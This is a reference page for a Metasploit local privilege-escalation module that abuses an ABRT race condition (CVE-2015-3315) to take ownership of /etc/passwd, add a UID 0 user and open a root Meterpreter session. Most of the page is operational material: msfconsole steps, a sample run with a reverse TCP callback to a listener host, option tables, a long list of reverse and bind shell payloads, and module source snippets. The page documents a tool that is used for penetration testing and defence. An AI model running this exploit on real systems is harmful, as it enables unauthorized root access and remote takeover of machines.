ABRT raceabrt Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/abrt_raceabrt_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ABRT raceabrt Privilege Escalation
Module: exploit/linux/local/abrt_raceabrt_priv_esc
Source code: modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
Disclosure date: 2015-04-14
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-1862, CVE-2015-3315

This module attempts to gain root privileges on Linux systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler. A race condition allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on /var/tmp/abrt/*/maps to change the ownership of /etc/passwd, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes. This module has been tested successfully on: abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64; abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64; abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64; abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/abrt_raceabrt_priv_esc
msf exploit(abrt_raceabrt_priv_esc) > show targets
    ... a list of targets ...
msf exploit(abrt_raceabrt_priv_esc) > set TARGET target-id
msf exploit(abrt_raceabrt_priv_esc) > show options
    ... show and set options ...
msf exploit(abrt_raceabrt_priv_esc) > set SESSION session-id
msf exploit(abrt_raceabrt_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Linux systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.

Vulnerable Application


A race condition allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on /var/tmp/abrt/*/maps to change the ownership of /etc/passwd, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.

This module has been tested successfully on:

  • abrt 2.1.11-12.el7 on RHEL 7.0 x86_64
  • abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
  • abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
  • abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
  • abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/abrt_raceabrt_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


USERNAME

Username for the new UID=0 user (default: random)

SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf > use exploit/linux/local/abrt_raceabrt_priv_esc 
  msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/abrt_raceabrt_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [*] Writing '/tmp/.C17d3UYQy' (64240 bytes) ...
  [*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
  [+] Success! '/etc/passwd' is writable
  [*] Adding pauITBusGM user to /etc/passwd ...
  [*] Writing '/tmp/.u8zOz4c' (207 bytes) ...
  [*] Sending stage (857352 bytes) to 172.16.191.137
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:38938) at 2018-02-03 21:29:56 -0500

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : localhost.localdomain
  OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the linux/local/abrt_raceabrt_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/abrt_raceabrt_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/abrt_raceabrt_priv_esc) > show info

       Name: ABRT raceabrt Privilege Escalation
     Module: exploit/linux/local/abrt_raceabrt_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-14

Provided by:
  Tavis Ormandy
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  SESSION                    yes       The session to run this module on.
  TIMEOUT   900              yes       Race timeout (seconds)
  USERNAME                   no        Username of new UID=0 user (default: random)

Payload information:

Description:
  This module attempts to gain root privileges on Linux systems with a 
  vulnerable version of Automatic Bug Reporting Tool (ABRT) configured 
  as the crash handler. A race condition allows local users to change 
  ownership of arbitrary files (CVE-2015-3315). This module uses a 
  symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of 
  `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root 
  privileges. Winning the race could take a few minutes. This module 
  has been tested successfully on: abrt 2.1.11-12.el7 on RHEL 7.0 
  x86_64; abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64; abrt 
  2.2.1-1.fc19 on Fedora Desktop 19 x86_64; abrt 2.2.2-2.fc20 on 
  Fedora Desktop 20 x86_64; abrt 2.3.0-3.fc21 on Fedora Desktop 21 
  x86_64.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-3315
  https://www.exploit-db.com/exploits/36747
  http://www.securityfocus.com/bid/75117
  https://gist.github.com/taviso/fe359006836d6cd1091e
  http://www.openwall.com/lists/oss-security/2015/04/14/4
  http://www.openwall.com/lists/oss-security/2015/04/16/12
  https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92
  https://access.redhat.com/security/cve/cve-2015-1862
  https://access.redhat.com/security/cve/cve-2015-3315
  https://access.redhat.com/articles/1415483
  https://bugzilla.redhat.com/show_bug.cgi?id=1211223
  https://bugzilla.redhat.com/show_bug.cgi?id=1211835
  https://bugzilla.redhat.com/show_bug.cgi?id=1218239

Module Options


This is a complete list of options available in the linux/local/abrt_raceabrt_priv_esc exploit:

msf6 exploit(linux/local/abrt_raceabrt_priv_esc) > show options

Module options (exploit/linux/local/abrt_raceabrt_priv_esc):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   SESSION                    yes       The session to run this module on.
   TIMEOUT   900              yes       Race timeout (seconds)
   USERNAME                   no        Username of new UID=0 user (default: random)

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/abrt_raceabrt_priv_esc exploit:

msf6 exploit(linux/local/abrt_raceabrt_priv_esc) > show advanced

Module advanced options (exploit/linux/local/abrt_raceabrt_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/abrt_raceabrt_priv_esc module can exploit:

msf6 exploit(linux/local/abrt_raceabrt_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/abrt_raceabrt_priv_esc exploit:

msf6 exploit(linux/local/abrt_raceabrt_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/abrt_raceabrt_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/abrt_raceabrt_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

File /etc/passwd is immutable


Here is a relevant code snippet related to the "File /etc/passwd is immutable" error message:

90:	    datastore['TIMEOUT']
91:	  end
92:	
93:	  def check
94:	    if immutable?('/etc/passwd')
95:	      vprint_error 'File /etc/passwd is immutable'
96:	      return CheckCode::Safe
97:	    end
98:	
99:	    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
100:	    unless kernel_core_pattern.include? 'abrt-hook-ccpp'

System is NOT configured to use ABRT for crash reporting


Here is a relevant code snippet related to the "System is NOT configured to use ABRT for crash reporting" error message:

96:	      return CheckCode::Safe
97:	    end
98:	
99:	    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
100:	    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
101:	      vprint_error 'System is NOT configured to use ABRT for crash reporting'
102:	      return CheckCode::Safe
103:	    end
104:	    vprint_good 'System is configured to use ABRT for crash reporting'
105:	
106:	    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'

Directory '/var/spool/abrt' exists. System has been patched.


Here is a relevant code snippet related to the "Directory '/var/spool/abrt' exists. System has been patched." error message:

102:	      return CheckCode::Safe
103:	    end
104:	    vprint_good 'System is configured to use ABRT for crash reporting'
105:	
106:	    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'
107:	      vprint_error "Directory '/var/spool/abrt' exists. System has been patched."
108:	      return CheckCode::Safe
109:	    end
110:	    vprint_good 'System does not appear to have been patched'
111:	
112:	    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'

Directory '/var/tmp/abrt' does NOT exist


Here is a relevant code snippet related to the "Directory '/var/tmp/abrt' does NOT exist" error message:

108:	      return CheckCode::Safe
109:	    end
110:	    vprint_good 'System does not appear to have been patched'
111:	
112:	    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'
113:	      vprint_error "Directory '/var/tmp/abrt' does NOT exist"
114:	      return CheckCode::Safe
115:	    end
116:	    vprint_good "Directory '/var/tmp/abrt' exists"
117:	
118:	    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'

abrt-ccp service NOT running


Here is a relevant code snippet related to the "abrt-ccp service NOT running" error message:

114:	      return CheckCode::Safe
115:	    end
116:	    vprint_good "Directory '/var/tmp/abrt' exists"
117:	
118:	    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
119:	      vprint_error 'abrt-ccp service NOT running'
120:	      return CheckCode::Safe
121:	    end
122:	    vprint_good 'abrt-ccpp service is running'
123:	
124:	    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

138:	    register_file_for_cleanup path
139:	  end
140:	
141:	  def exploit
142:	    if check != CheckCode::Detected
143:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
144:	    end
145:	
146:	    @chown_file = '/etc/passwd'
147:	
148:	    if datastore['USERNAME'].blank?

Failed to own '<CHOWN_FILE>'


Here is a relevant code snippet related to the "Failed to own '<CHOWN_FILE>'" error message:

172:	    output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout
173:	    output.each_line { |line| vprint_status line.chomp }
174:	
175:	    # Check if we own /etc/passwd
176:	    unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true'
177:	      fail_with Failure::Unknown, "Failed to own '#{@chown_file}'"
178:	    end
179:	
180:	    print_good "Success! '#{@chown_file}' is writable"
181:	
182:	    # Add new user with no password

Could not reinstate root ownership of <CHOWN_FILE>


Here is a relevant code snippet related to the "Could not reinstate root ownership of <CHOWN_FILE>" error message:

241:	        new_user_removed = true
242:	      end
243:	    end
244:	
245:	    unless root_owns_passwd
246:	      print_warning "Could not reinstate root ownership of #{@chown_file}"
247:	    end
248:	
249:	    unless new_user_removed
250:	      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
251:	    end

Could not remove user '<USERNAME>' from <CHOWN_FILE>


Here is a relevant code snippet related to the "Could not remove user '<USERNAME>' from <CHOWN_FILE>" error message:

245:	    unless root_owns_passwd
246:	      print_warning "Could not reinstate root ownership of #{@chown_file}"
247:	    end
248:	
249:	    unless new_user_removed
250:	      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
251:	    end
252:	  rescue => e
253:	    print_error "Error during cleanup: #{e.message}"
254:	  ensure
255:	    super

Error during cleanup: <E.MESSAGE>


Here is a relevant code snippet related to the "Error during cleanup: <E.MESSAGE>" error message:

247:	    end
248:	
249:	    unless new_user_removed
250:	      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
251:	    end
252:	  rescue => e
253:	    print_error "Error during cleanup: #{e.message}"
254:	  ensure
255:	    super
256:	  end
257:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Tavis Ormandy
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.